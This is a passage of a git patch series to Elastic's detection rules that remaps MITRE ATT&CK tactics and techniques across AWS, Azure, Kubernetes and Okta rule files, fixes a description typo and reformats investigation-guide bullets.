-[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" - diff --git a/rules_building_block/persistence_web_server_potential_sql_injection.toml b/rules_building_block/persistence_web_server_potential_sql_injection.toml index a6611cbeb3b..43f2275ad19 100644 --- a/rules_building_block/persistence_web_server_potential_sql_injection.toml +++ b/rules_building_block/persistence_web_server_potential_sql_injection.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/11/19" integration = ["nginx", "apache", "apache_tomcat", "iis", "traefik"] maturity = "production" -updated_date = "2026/03/16" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -124,3 +124,16 @@ reference = "https://attack.mitre.org/techniques/T1595/003/" id = "TA0043" name = "Reconnaissance" reference = "https://attack.mitre.org/tactics/TA0043/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/persistence_web_server_sus_file_creation.toml b/rules_building_block/persistence_web_server_sus_file_creation.toml index 3141a9913dc..e004c973f9d 100644 --- a/rules_building_block/persistence_web_server_sus_file_creation.toml +++ b/rules_building_block/persistence_web_server_sus_file_creation.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2025/03/06" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -160,3 +160,16 @@ reference = "https://attack.mitre.org/techniques/T1071/" id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1190" +name = "Exploit Public-Facing Application" +reference = "https://attack.mitre.org/techniques/T1190/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml index 39bc5a78dcd..9a83403a8e3 100644 --- a/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml +++ b/rules_building_block/privilege_escalation_sts_getsessiontoken_abuse.toml @@ -3,7 +3,7 @@ bypass_bbr_timing = true creation_date = "2021/05/17" integration = ["aws"] maturity = "production" -updated_date = "2025/11/03" +updated_date = "2026/03/24" [rule] author = ["Austin Songer", "Elastic"] @@ -92,34 +92,52 @@ event.dataset: aws.cloudtrail [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" - [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", From 1440d3442c481dbac14086376a7b09215bdff407 Mon Sep 17 00:00:00 2001 From: Isai <59296946+imays11@users.noreply.github.com> Date: Wed, 25 Mar 2026 11:39:35 -0400 Subject: [PATCH 12/16] fix typo in description --- .../exfiltration_sns_rare_protocol_subscription_by_user.toml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml index e0dc490b37c..e0a94c08fa9 100644 --- a/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml +++ b/rules/integrations/aws/exfiltration_sns_rare_protocol_subscription_by_user.toml @@ -7,7 +7,7 @@ updated_date = "2026/03/24" [rule] author = ["Elastic"] description = """ -Identifies when a use subscribes to an SNS topic using a new protocol type (ie. email, http, lambda, etc.). SNS allows users to subscribe to recieve topic messages across a broad range of protocols like email, sms, lambda functions, http endpoints, and applications. Adversaries may subscribe to an SNS topic to collect sensitive information or exfiltrate data via an external email address, cross-account AWS service or other means. This rule identifies a new protocol subscription method for a particular user. +Identifies when a user subscribes to an SNS topic using a new protocol type (ie. email, http, lambda, etc.). SNS allows users to subscribe to recieve topic messages across a broad range of protocols like email, sms, lambda functions, http endpoints, and applications. Adversaries may subscribe to an SNS topic to collect sensitive information or exfiltrate data via an external email address, cross-account AWS service or other means. This rule identifies a new protocol subscription method for a particular user. """ false_positives = [ """ From 551d36be691ba94da586fb27389d9565b876e3d5 Mon Sep 17 00:00:00 2001 From: Isai <59296946+imays11@users.noreply.github.com> Date: Wed, 25 Mar 2026 11:41:31 -0400 Subject: [PATCH 13/16] adding back privilege escalation tactic --- ..._created_access_keys_for_another_user.toml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) diff --git a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml index 8c1284af2e7..be58e3a20a7 100644 --- a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml +++ b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml @@ -173,6 +173,25 @@ reference = "https://attack.mitre.org/techniques/T1098/001/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.001" +name = "Additional Cloud Credentials" +reference = "https://attack.mitre.org/techniques/T1098/001/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + + [rule.investigation_fields] field_names = [ "@timestamp", From d5c1cab57f85d6635f568548ad37aa496e87bb08 Mon Sep 17 00:00:00 2001 From: terrancedejesus Date: Wed, 25 Mar 2026 11:46:52 -0400 Subject: [PATCH 14/16] dejesus - tags reviewed azure, o365, kubernetes, gcp, google_workspace, okta --- ...ccess_storage_account_key_regenerated.toml | 19 +--------- ...ge_blob_container_access_modification.toml | 13 ------- ...act_resources_resource_group_deletion.toml | 33 ++++++++--------- ...a_id_first_time_seen_device_code_auth.toml | 18 ++++++---- ...sent_grant_via_registered_application.toml | 30 +++------------- ..._code_grant_unusual_app_resource_user.toml | 6 ++++ ...via_first_party_microsoft_application.toml | 6 ++++ ...ersistence_automation_account_created.toml | 13 ------- ...id_user_signed_in_from_unusual_device.toml | 18 +--------- ...sistence_event_hub_created_or_updated.toml | 18 ---------- ...covery_denied_service_account_request.toml | 35 ------------------- .../execution_forbidden_creation_request.toml | 15 -------- ...l_access_anonymous_request_authorized.toml | 12 ------- ...calation_pod_created_with_hostnetwork.toml | 13 ------- ...ege_escalation_privileged_pod_created.toml | 13 ------- ...nge_followed_by_workload_modification.toml | 25 ++++--------- ...e_workload_modification_by_user_agent.toml | 32 ++++++----------- ..._service_account_rbac_write_operation.toml | 24 ++++--------- ...ignment_of_controller_service_account.toml | 12 ------- ...ilbox_access_by_unusual_client_app_id.toml | 17 --------- ...a_id_device_reg_via_oauth_redirection.toml | 19 +--------- ...access_identity_user_account_lockouts.toml | 17 +++++++++ ...ange_mailbox_audit_bypass_association.toml | 5 --- ...tra_id_portal_login_impossible_travel.toml | 17 --------- ...l_access_attempted_bypass_of_okta_mfa.toml | 17 --------- ...multiple_user_agent_os_authentication.toml | 17 --------- ...ccess_okta_aitm_session_cookie_replay.toml | 19 +--------- ...ttempt_to_deactivate_okta_application.toml | 18 ---------- ...ta_attempt_to_delete_okta_application.toml | 18 ---------- ...ta_attempt_to_modify_okta_application.toml | 13 ------- ...rrence_user_session_started_via_proxy.toml | 17 --------- ...ta_user_attempted_unauthorized_access.toml | 9 +---- ...ss_sign_in_events_via_third_party_idp.toml | 6 +--- ...cation_sso_from_unknown_client_device.toml | 17 --------- ...ent_multiple_sessions_for_single_user.toml | 17 --------- 35 files changed, 89 insertions(+), 509 deletions(-) diff --git a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml index 2992628f85d..e87f967702a 100644 --- a/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml +++ b/rules/integrations/azure/credential_access_storage_account_key_regenerated.toml @@ -73,6 +73,7 @@ tags = [ "Use Case: Identity and Access Audit", "Tactic: Credential Access", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "query" @@ -117,21 +118,3 @@ reference = "https://attack.mitre.org/techniques/T1098/001/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.001" -name = "Additional Cloud Credentials" -reference = "https://attack.mitre.org/techniques/T1098/001/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml index f39b0218f9a..574b980395c 100644 --- a/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml +++ b/rules/integrations/azure/discovery_storage_blob_container_access_modification.toml @@ -97,16 +97,3 @@ reference = "https://attack.mitre.org/techniques/T1222/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1537" -name = "Transfer Data to Cloud Account" -reference = "https://attack.mitre.org/techniques/T1537/" - - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - diff --git a/rules/integrations/azure/impact_resources_resource_group_deletion.toml b/rules/integrations/azure/impact_resources_resource_group_deletion.toml index a28f3b45431..cc81e8e2578 100644 --- a/rules/integrations/azure/impact_resources_resource_group_deletion.toml +++ b/rules/integrations/azure/impact_resources_resource_group_deletion.toml @@ -80,6 +80,21 @@ event.dataset:azure.activitylogs and azure.activitylogs.operation_name:"MICROSOF [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1529" +name = "System Shutdown/Reboot" +reference = "https://attack.mitre.org/techniques/T1529/" + +[[rule.threat.technique]] +id = "T1490" +name = "Inhibit System Recovery" +reference = "https://attack.mitre.org/techniques/T1490/" + +[[rule.threat.technique]] +id = "T1489" +name = "Service Stop" +reference = "https://attack.mitre.org/techniques/T1489/" + [[rule.threat.technique]] id = "T1485" name = "Data Destruction" @@ -90,21 +105,3 @@ reference = "https://attack.mitre.org/techniques/T1485/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" -[[rule.threat]] -framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - - - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml index 43a2a424aa0..901507c48a5 100644 --- a/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_first_time_seen_device_code_auth.toml @@ -78,6 +78,7 @@ tags = [ "Use Case: Identity and Access Audit", "Tactic: Initial Access", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "new_terms" @@ -137,14 +138,19 @@ reference = "https://attack.mitre.org/tactics/TA0001/" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" [rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name"] diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml index dd13f3c1aa0..d521704f143 100644 --- a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml @@ -102,36 +102,16 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" +[[rule.threat.technique]] +id = "T1199" +name = "Trusted Relationship" +reference = "https://attack.mitre.org/techniques/T1199/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml index 7e5c8cc7b8f..2c633fc8965 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml @@ -75,6 +75,7 @@ tags = [ "Tactic: Initial Access", "Tactic: Credential Access", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "new_terms" @@ -160,6 +161,11 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" +[[rule.threat.technique]] +id = "T1199" +name = "Trusted Relationship" +reference = "https://attack.mitre.org/techniques/T1199/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml index b8869e67cbe..e5ddf8e989b 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml @@ -74,6 +74,7 @@ tags = [ "Use Case: Identity and Access Audit", "Resources: Investigation Guide", "Tactic: Initial Access", + ] timestamp_override = "event.ingested" type = "query" @@ -160,6 +161,11 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" +[[rule.threat.technique]] +id = "T1199" +name = "Trusted Relationship" +reference = "https://attack.mitre.org/techniques/T1199/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" diff --git a/rules/integrations/azure/persistence_automation_account_created.toml b/rules/integrations/azure/persistence_automation_account_created.toml index a349b7481c8..ce9b522545d 100644 --- a/rules/integrations/azure/persistence_automation_account_created.toml +++ b/rules/integrations/azure/persistence_automation_account_created.toml @@ -88,16 +88,3 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1651" -name = "Cloud Administration Command" -reference = "https://attack.mitre.org/techniques/T1651/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml index d9fa2d2aa9f..f26e6c6a39d 100644 --- a/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml +++ b/rules/integrations/azure/persistence_entra_id_user_signed_in_from_unusual_device.toml @@ -67,6 +67,7 @@ tags = [ "Data Source: Microsoft Entra ID", "Data Source: Microsoft Entra ID Sign-in Logs", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "new_terms" @@ -118,23 +119,6 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml index 8752c55c138..fc8d63fc48a 100644 --- a/rules/integrations/azure/persistence_event_hub_created_or_updated.toml +++ b/rules/integrations/azure/persistence_event_hub_created_or_updated.toml @@ -111,21 +111,3 @@ reference = "https://attack.mitre.org/techniques/T1552/005/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" - -[[rule.threat.technique.subtechnique]] -id = "T1098.003" -name = "Additional Cloud Roles" -reference = "https://attack.mitre.org/techniques/T1098/003/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml index 2afce3c35ea..d2956e2aa07 100644 --- a/rules/integrations/kubernetes/discovery_denied_service_account_request.toml +++ b/rules/integrations/kubernetes/discovery_denied_service_account_request.toml @@ -98,41 +98,6 @@ id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml index 46cf1eb9e04..3d7530a10c0 100644 --- a/rules/integrations/kubernetes/execution_forbidden_creation_request.toml +++ b/rules/integrations/kubernetes/execution_forbidden_creation_request.toml @@ -79,18 +79,3 @@ id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml index 792d42d750c..1ac77ed6803 100644 --- a/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml +++ b/rules/integrations/kubernetes/initial_access_anonymous_request_authorized.toml @@ -103,18 +103,6 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original"] diff --git a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml index 00cfc028b8d..abd158abb57 100644 --- a/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml +++ b/rules/integrations/kubernetes/privilege_escalation_pod_created_with_hostnetwork.toml @@ -122,16 +122,3 @@ reference = "https://attack.mitre.org/techniques/T1610/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml index 00b34f2cfe3..dad214db728 100644 --- a/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml +++ b/rules/integrations/kubernetes/privilege_escalation_privileged_pod_created.toml @@ -120,16 +120,3 @@ reference = "https://attack.mitre.org/techniques/T1610/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml index 44a7da15684..a2d144b306f 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_rbac_change_followed_by_workload_modification.toml @@ -36,16 +36,16 @@ This rule detects when a user grants or broadens high-risk permissions in a Role ### False positive analysis -- A platform engineer performing an urgent, legitimate RBAC adjustment (e.g., expanding a Role/ClusterRole for a new feature rollout) and then immediately patching or deploying a DaemonSet/Deployment/CronJob as part of the same change window can match this sequence. +- A platform engineer performing an urgent, legitimate RBAC adjustment (e.g., expanding a Role/ClusterRole for a new feature rollout) and then immediately patching or deploying a DaemonSet/Deployment/CronJob as part of the same change window can match this sequence. - A CI/CD pipeline or GitOps-style workflow using a non-system:masters identity may update RBAC manifests and then apply workload updates within minutes during routine releases, producing this pattern without malicious intent. ### Response and remediation -- Immediately revoke or roll back the risky Role/ClusterRole changes and remove any new/updated RoleBinding/ClusterRoleBinding that ties the elevated permissions to the triggering user or service account. -- Quarantine the modified Deployment/DaemonSet/CronJob by scaling it to zero or deleting it and cordon/drain affected nodes if pods ran privileged, used hostPath mounts, or executed on many nodes. -- Rotate credentials and access paths exposed through the workload (service account tokens, kubeconfig files, mounted secrets, cloud keys) and invalidate any newly issued tokens tied to the actor. -- For eradication and recovery, redeploy workloads from trusted Git/registry sources, block the suspicious images/digests in admission controls, and verify no persistence remains via CronJobs, DaemonSets, webhook configurations, or additional RBAC bindings. -- Escalate to incident response and platform leadership if the RBAC change included wildcard permissions or escalation verbs, if the workload ran privileged/hostNetwork/hostPID, or if sensitive secrets were accessed or exfiltration is suspected. +- Immediately revoke or roll back the risky Role/ClusterRole changes and remove any new/updated RoleBinding/ClusterRoleBinding that ties the elevated permissions to the triggering user or service account. +- Quarantine the modified Deployment/DaemonSet/CronJob by scaling it to zero or deleting it and cordon/drain affected nodes if pods ran privileged, used hostPath mounts, or executed on many nodes. +- Rotate credentials and access paths exposed through the workload (service account tokens, kubeconfig files, mounted secrets, cloud keys) and invalidate any newly issued tokens tied to the actor. +- For eradication and recovery, redeploy workloads from trusted Git/registry sources, block the suspicious images/digests in admission controls, and verify no persistence remains via CronJobs, DaemonSets, webhook configurations, or additional RBAC bindings. +- Escalate to incident response and platform leadership if the RBAC change included wildcard permissions or escalation verbs, if the workload ran privileged/hostNetwork/hostPID, or if sensitive secrets were accessed or exfiltration is suspected. - Harden by enforcing least-privilege RBAC, requiring peer approval for RBAC changes, restricting workload mutations via GitOps-only service accounts, and using admission policies to deny privileged pods, hostPath mounts, and unapproved registries. """ references = [ @@ -114,16 +114,3 @@ reference = "https://attack.mitre.org/techniques/T1098/006/" id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml index 5db31548fc8..e1ff2f63e1d 100644 --- a/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml +++ b/rules/integrations/kubernetes/privilege_escalation_sensitive_workload_modification_by_user_agent.toml @@ -26,24 +26,24 @@ This rule detects allowed create or patch activity against sensitive Kubernetes ### Possible investigation steps -- Retrieve the full audit event for the change and compare it to the most recent prior modification of the same workload to identify what was altered (e.g., image, command/args, env/secret refs, volumes, serviceAccount, securityContext, hostPath/hostNetwork, privileged settings). -- Attribute the action to a real identity by tracing the Kubernetes user to its backing cloud/IAM identity or kubeconfig/cert and validate whether the access path (SSO, token, service account, CI/CD runner) and source network location are expected for that operator. -- Determine blast radius by listing other recent creates/patches by the same identity and from the same origin across namespaces, and check for follow-on actions such as creating RBAC bindings, secrets, or additional controllers. -- Inspect the affected workload’s rollout status and pod specs to confirm whether new pods were created, then review container images, pull registries, and runtime behavior for indicators of compromise (unexpected network egress, crypto-mining, credential access, or exec activity). +- Retrieve the full audit event for the change and compare it to the most recent prior modification of the same workload to identify what was altered (e.g., image, command/args, env/secret refs, volumes, serviceAccount, securityContext, hostPath/hostNetwork, privileged settings). +- Attribute the action to a real identity by tracing the Kubernetes user to its backing cloud/IAM identity or kubeconfig/cert and validate whether the access path (SSO, token, service account, CI/CD runner) and source network location are expected for that operator. +- Determine blast radius by listing other recent creates/patches by the same identity and from the same origin across namespaces, and check for follow-on actions such as creating RBAC bindings, secrets, or additional controllers. +- Inspect the affected workload’s rollout status and pod specs to confirm whether new pods were created, then review container images, pull registries, and runtime behavior for indicators of compromise (unexpected network egress, crypto-mining, credential access, or exec activity). - Validate the change against an approved deployment workflow by correlating with GitOps/CI commit history and change tickets, and if unapproved, contain by scaling down/rolling back the workload and revoking the credential or token used. ### False positive analysis -- A legitimate on-call engineer performs an emergency `kubectl` create/patch to a Deployment/CronJob/DaemonSet from a new workstation, VPN egress IP, or updated kubectl version, producing an unusual user_agent/source IP/username combination despite being authorized. +- A legitimate on-call engineer performs an emergency `kubectl` create/patch to a Deployment/CronJob/DaemonSet from a new workstation, VPN egress IP, or updated kubectl version, producing an unusual user_agent/source IP/username combination despite being authorized. - A routine automation path changes (e.g., CI runner or service account rotated/migrated to a new node pool or network segment) and continues applying standard workload updates, causing the same create/patch activity to appear anomalous due to the new origin and client identity. ### Response and remediation -- Immediately pause impact by scaling the modified Deployment/CronJob to 